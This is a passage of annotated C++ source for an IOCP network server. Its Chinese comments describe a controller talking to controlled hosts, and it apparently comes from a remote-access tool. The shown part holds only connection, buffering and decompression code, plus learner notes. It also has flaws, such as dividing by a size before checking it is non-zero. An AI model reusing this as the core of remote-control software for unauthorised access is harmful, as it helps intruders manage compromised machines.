//备份要发送的数据到m_ResendWriteBuffer缓冲区中
LPBYTE lpResendWriteBuffer = new BYTE[nSize];
CopyMemory(lpResendWriteBuffer, lpData, nSize);
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(lpResendWriteBuffer, nSize); // 备份发送的数据
delete [] lpResendWriteBuffer;
}
else // 要求重发
{ /*如果主控端在接收数据的时候出现了异常,这个时候主控端需要让被控端重新发送数据,则仅仅是向被控端准备发送标志数据包,如此,被控端会重新向客户端发送备份的数据*/
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag)); // 备份发送的数据
}
// Wait for Data Ready signal to become available
// 等待上次发送结束
WaitForSingleObject(pContext->m_hWriteComplete, INFINITE);
// Prepare Packet
// pContext->m_wsaOutBuffer.buf = (CHAR*) new BYTE[nSize];
// pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
/*用PostQueuedCompletionStatus投递一个类型为IOWrite类型的发送请求,
注意此函数的第二个参数为0。这个请求会由函数OnClientWriting去完成*/
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
pContext->m_nMsgOut++;
}catch(...){}
}
//
// FUNCTION: CClientListener::OnClientInitializing
//
// DESCRIPTION: Called when client is initailizing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///从此函数可以看出初始化连接的时候什么都没做直接返回true/
bool CIOCPServer::OnClientInitializing(ClientContext* pContext, DWORD dwIoSize)
{
// We are not actually doing anything here, but we could for instance make
// a call to Send() to send a greeting message or something
return true; // make sure to issue a read after this
}
//
// FUNCTION: CIOCPServer::OnClientReading
//
// DESCRIPTION: Called when client is reading
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientReading(ClientContext* pContext, DWORD dwIoSize)//接受数据函数入口点
{
CLock cs(CIOCPServer::m_cs, "OnClientReading");//线程同步
try
{
//
static DWORD nLastTick = GetTickCount();//申明相应变量并赋值,Gertickcount返回操作系统从启动到现在的毫秒数
static DWORD nBytes = 0;
nBytes += dwIoSize;
/*静态局部变量的生存周期不会因为该函数被执行完而结束,它在全局内存存储。
因此,上述反应传输速度的代码应该这么理解,当第一次调用OnClientReadling函数的时候
,static DWORD nLastTick = GetTickCount();static DWORD nBytes = 0;这两句会被执行,
接下来通过判断采样时间是否超过一秒钟,第一次调用的时候肯定不会超过一秒钟,
但是当第二次调用该函数的时候,那两句定义静态变量的语句不会被执行,
这个时候nBytes的值会是上次传输的大小+本次传输的大小,
并且nLastTick的值还是上次采样的时间,由于本次采样的时间也许会超过了一秒钟,
因此,反映接收速度的参数m_nRecvKbps会被重新改写值,
并且这个时候,nBytes与nLastTick的值会被重新改写*/
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nRecvKbps), nBytes);
nBytes = 0;
}
//
/* 如果本次接收的数据大小为0的话,说明在数据传输的过程中遇到了不可预知的错误,
这个时候就将这个客户端删除掉去它的连接,让它在重新连接上来*/
if (dwIoSize == 0)
{
RemoveStaleClient(pContext, FALSE);
return false;
}
/*这个if语句发生的条件是如果被控端在接收主控端发送过去的数据的时候出现了错误,
它会要求主控端重新发送数据,而这种要求重发数据的操作正是通过被控端向主控端仅仅发送传输标志。
如果收到的是这样的数据包,则主控端会将备份区的数据重新发送到被控端。*/
if (dwIoSize == FLAG_SIZE && memcmp(pContext->m_byInBuffer, m_bPacketFlag, FLAG_SIZE) == 0)
{
// 重新发送
Send(pContext, pContext->m_ResendWriteBuffer.GetBuffer(), pContext->m_ResendWriteBuffer.GetBufferLen());
// 必须再投递一个接收请求
PostRecv(pContext);
return true;
}
// Add the message to out message
// Dont forget there could be a partial, 1, 1 or more + partial mesages
pContext->m_CompressionBuffer.Write(pContext->m_byInBuffer,dwIoSize);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE);//回调函数
// Check real Data
while (pContext->m_CompressionBuffer.GetBufferLen() > HDR_SIZE)//数据包长度是否大于13
{
//读出包中的标志与大小,验证接收的包是否合法
BYTE bPacketFlag[FLAG_SIZE];
CopyMemory(bPacketFlag, pContext->m_CompressionBuffer.GetBuffer(), sizeof(bPacketFlag));
if (memcmp(m_bPacketFlag, bPacketFlag, sizeof(m_bPacketFlag)) != 0)
throw "bad buffer";
/*取出包中的标志、整个包的大小、未压缩数据的大小。
读取出压缩数据,并进行解压处理。将解压后的数据存储到解压缓冲区中*/
int nSize = 0;
CopyMemory(&nSize, pContext->m_CompressionBuffer.GetBuffer(FLAG_SIZE), sizeof(int));
// Update Process Variable
pContext->m_nTransferProgress = pContext->m_CompressionBuffer.GetBufferLen() * 100 / nSize;
if (nSize && (pContext->m_CompressionBuffer.GetBufferLen()) >= nSize)
{
int nUnCompressLength = 0;
// Read off header
pContext->m_CompressionBuffer.Read((PBYTE) bPacketFlag, sizeof(bPacketFlag));
pContext->m_CompressionBuffer.Read((PBYTE) &nSize, sizeof(int));
pContext->m_CompressionBuffer.Read((PBYTE) &nUnCompressLength, sizeof(int));
//取出包中的标志、整个包的大小、未压缩数据的大小。读取出压缩数据,并进行解压处理。将解压后的数据存储到解压缓冲区中。
//如果上述过程有任意差池则调用Send(pContext, NULL, 0);要求受控端从新发送数据。//
// SO you would process your data here
// I'm just going to post message so we can see the data
int nCompressLength = nSize - HDR_SIZE;
PBYTE pData = new BYTE[nCompressLength];
PBYTE pDeCompressionData = new BYTE[nUnCompressLength];
if (pData == NULL || pDeCompressionData == NULL)
throw "bad Allocate";
pContext->m_CompressionBuffer.Read(pData, nCompressLength);
//
unsigned long destLen = nUnCompressLength;
int nRet = uncompress(pDeCompressionData, &destLen, pData, nCompressLength);
//
if (nRet == Z_OK)
{
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.Write(pDeCompressionData, destLen);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE_COMPLETE);
}
else
{
throw "bad buffer";
}
delete [] pData;
delete [] pDeCompressionData;
pContext->m_nMsgIn++;
}
else
break;
}
// Post to WSARecv Next
PostRecv(pContext);
}catch(...)
{ //述过程有任意差池则调用Send(pContext, NULL, 0);要求受控端从新发送数据
pContext->m_CompressionBuffer.ClearBuffer();
// 要求重发,就发送0, 内核自动添加数包标志
Send(pContext, NULL, 0);
PostRecv(pContext);
}
return true;
}
//
// FUNCTION: CIOCPServer::OnClientWriting
//
// DESCRIPTION: Called when client is writing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientWriting(ClientContext* pContext, DWORD dwIoSize)
{
try
{
/*首先,跟接收数据一样,先更新一下代表发送速度的变量值:m_nSendKbps,
这个更新的过程,跟接收的时候的一样,在这里只要注意一点局部静态变量的使用方法就好了,不再赘述。*/
//
static DWORD nLastTick = GetTickCount();
static DWORD nBytes = 0;
nBytes += dwIoSize;
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nSendKbps), nBytes);
nBytes = 0;
}
//
//由于dwIOSize的值为0,因此接下来的那个判断语句if代码块永远不会被执行
ULONG ulFlags = MSG_PARTIAL;
// Finished writing - tidy up
pContext->m_WriteBuffer.Delete(dwIoSize);
if (pContext->m_WriteBuffer.GetBufferLen() == 0)
{
pContext->m_WriteBuffer.ClearBuffer();
// Write complete
SetEvent(pContext->m_hWriteComplete);
return true; // issue new read after this one
}
else
{
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_TRANSMIT);
pContext->m_wsaOutBuffer.buf = (char*) pContext->m_WriteBuffer.GetBuffer();
pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
//最后,在设置好WSASend函数的各个参数值之后,将数据直接就发送出去了,这个时候的发送情况基本上是一定能成功的,并且一般不会阻塞。除非被控端掉线
int nRetVal = WSASend(pContext->m_Socket,
&pContext->m_wsaOutBuffer,
1,
&pContext->m_wsaOutBuffer.len,
ulFlags,
&pOverlap->m_ol,
NULL);
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING )
{
RemoveStaleClient( pContext, FALSE );
}
}
}catch(...){}
return false; // issue new read after this one
}
//
// FUNCTION: CIOCPServer::CloseCompletionPort
//
// DESCRIPTION: Close down the IO Complete Port, queue and associated client context structs
// which in turn will close the sockets...
//
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::CloseCompletionPort()//当线程总数不为零时循环执行
{
while (m_nWorkerCnt)
{
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) NULL, NULL);//抛出一个特别的消息
Sleep(100);//睡眠一会
}
// Close the CompletionPort and stop any more requests相关参数赋值为空,关闭句柄
CloseHandle(m_hCompletionPort);
ClientContext* pContext = NULL;
do
{
POSITION pos = m_listContexts.GetHeadPosition();//获得索引
if (pos)
{
pContext = m_listContexts.GetNext(pos); //得到相关的结构并移除
RemoveStaleClient(pContext, FALSE);
}
}
while (!m_listContexts.IsEmpty());//这个列表不为空时运行
m_listContexts.RemoveAll();//移除所有链表
}
/*实现完成端口与套接字的绑定,并返回完成端口*/
BOOL CIOCPServer::AssociateSocketWithCompletionPort(SOCKET socket, HANDLE hCompletionPort, DWORD dwCompletionKey)
{
HANDLE h = CreateIoCompletionPort((HANDLE) socket, hCompletionPort, dwCompletionKey, 0);
return h == hCompletionPort;
}
//
// FUNCTION: CIOCPServer::RemoveStaleClient
//
// DESCRIPTION: Client has died on us, close socket and remove context from our list
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::RemoveStaleClient(ClientContext* pContext, BOOL bGraceful)
{
CLock cs(m_cs, "RemoveStaleClient");//线程同步
TRACE("CIOCPServer::RemoveStaleClient\n");
LINGER lingerStruct;//申明一个变量
//
// If we're supposed to abort the connection, set the linger value
// on the socket to 0.
//
/*等待套接字上的通信
如果在发送数据的过程中(send()没有完成,还有数据没发送)而调用了closesocket(),以前我们
一般采取的措施是"从容关闭"shutdown(s,SD_BOTH),但是数据是肯定丢失了,如何设置让程序满足具体
应用的要求(即让没发完的数据发送出去后在关闭socket)?
struct linger {
u_short l_onoff;
u_short l_linger;
};
linger m_sLinger;
m_sLinger.l_onoff=1;//(在closesocket()调用,但是还有数据没发送完毕的时候容许逗留)
// 如果m_sLinger.l_onoff=0;则功能和2.)作用相同;
m_sLinger.l_linger=5;//(容许逗留的时间为5秒)
setsockopt (s,SOL_SOCKET,SO_LINGER,(const char*)&m_sLinger,sizeof(linger)); */
if ( !bGraceful )
{
lingerStruct.l_onoff = 1;
lingerStruct.l_linger = 0;
setsockopt( pContext->m_Socket, SOL_SOCKET, SO_LINGER,
(char *)&lingerStruct, sizeof(lingerStruct) );
}
//
// Free context structures
//查找连接链表里与这个指针所指向的相同结构
if (m_listContexts.Find(pContext))
{
//
// Now close the socket handle. This will do an abortive or graceful close, as requested.
CancelIo((HANDLE) pContext->m_Socket);//完成此结构中套接字上悬而未决的操作
closesocket( pContext->m_Socket );
pContext->m_Socket = INVALID_SOCKET;//并置为空
while (!HasOverlappedIoCompleted((LPOVERLAPPED)pContext)) //判断是否真的所有IO操作完成了
Sleep(0);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_DISCONNECT);//调用回调函数,发送NC_CLIENT_DIS参数,此函数最终的作用就是在列表中删除与之对应的主机
MoveToFreePool(pContext);//移动到释放链表中,具体看函数
}
}
void CIOCPServer::Shutdown()
{
if (m_bInit == false)//初始化是否成功
return;
m_bInit = false;//如果成功就把相应的值置为flase
m_bTimeToKill = true;
// Stop the listener
Stop();
closesocket(m_socListen); //关闭相应的句柄和事件
WSACloseEvent(m_hEvent);
CloseCompletionPort();//关闭完成端口和删除线程同步句柄,跟进函数
DeleteCriticalSection(&m_cs);
while (!m_listFreePool.IsEmpty())//清楚释放链表
delete m_listFreePool.RemoveTail();
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Checks free pool otherwise allocates a context
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::MoveToFreePool(ClientContext *pContext)
{
CLock cs(m_cs, "MoveToFreePool");//线程同步
// Free context structures
POSITION pos = m_listContexts.Find(pContext);//查与此结构相同的索引
if (pos)
{
//调用CLearBuffer函数清空数据
pContext->m_CompressionBuffer.ClearBuffer();
pContext->m_WriteBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.ClearBuffer();
//加入到释放链表中
m_listFreePool.AddTail(pContext);
//移除索引
m_listContexts.RemoveAt(pos);
}
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Moves an 'used/stale' Context to the free pool for reuse
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
/在成功与主机进行连接后,调用此函数,返回值为指向ClinetContext结构的指针///
ClientContext* CIOCPServer::AllocateContext()
{
ClientContext* pContext = NULL;
CLock cs(CIOCPServer::m_cs, "AllocateContext");
if (!m_listFreePool.IsEmpty())//判断释放链表是否为空
{
pContext = m_listFreePool.RemoveHead();//不为空时取出一个链表
}
else
{
pContext = new ClientContext;//为空时新建一个
}
ASSERT(pContext);//断言这个不为空
if (pContext != NULL)//判断是否不为空
{
ZeroMemory(pContext, sizeof(ClientContext));//进行清零操作
pContext->m_bIsMainSocket = false;//是否是主套接的判定标示置为False
memset(pContext->m_Dialog, 0, sizeof(pContext->m_Dialog));//赋值此指针指向的结构中M_dialog数组的元素为零
}
return pContext;
}
//重新连接前需要移除他的链表,不中止SOKET连接
void CIOCPServer::ResetConnection(ClientContext* pContext)
{
CString strHost;
ClientContext* pCompContext = NULL;
CLock cs(CIOCPServer::m_cs, "ResetConnection");
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pCompContext = m_listContexts.GetNext(pos);
if (pCompContext == pContext)
{
RemoveStaleClient(pContext, TRUE);
break;
}
}
}
void CIOCPServer::DisconnectAll()
{
//把相应的变量值改变
m_bDisconnectAll = true;
CString strHost;
ClientContext* pContext = NULL;
CLock cs(CIOCPServer::m_cs, "DisconnectAll");
//移除所有连接的链表
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pContext = m_listContexts.GetNext(pos);
RemoveStaleClient(pContext, TRUE);
}
m_bDisconnectAll = false;
}
//简单返回
bool CIOCPServer::IsRunning()
{
return m_bInit;
}
//大家有什么疑问可以咨询,大家相互学习,文章中注释属于个人理解有误请指教..............................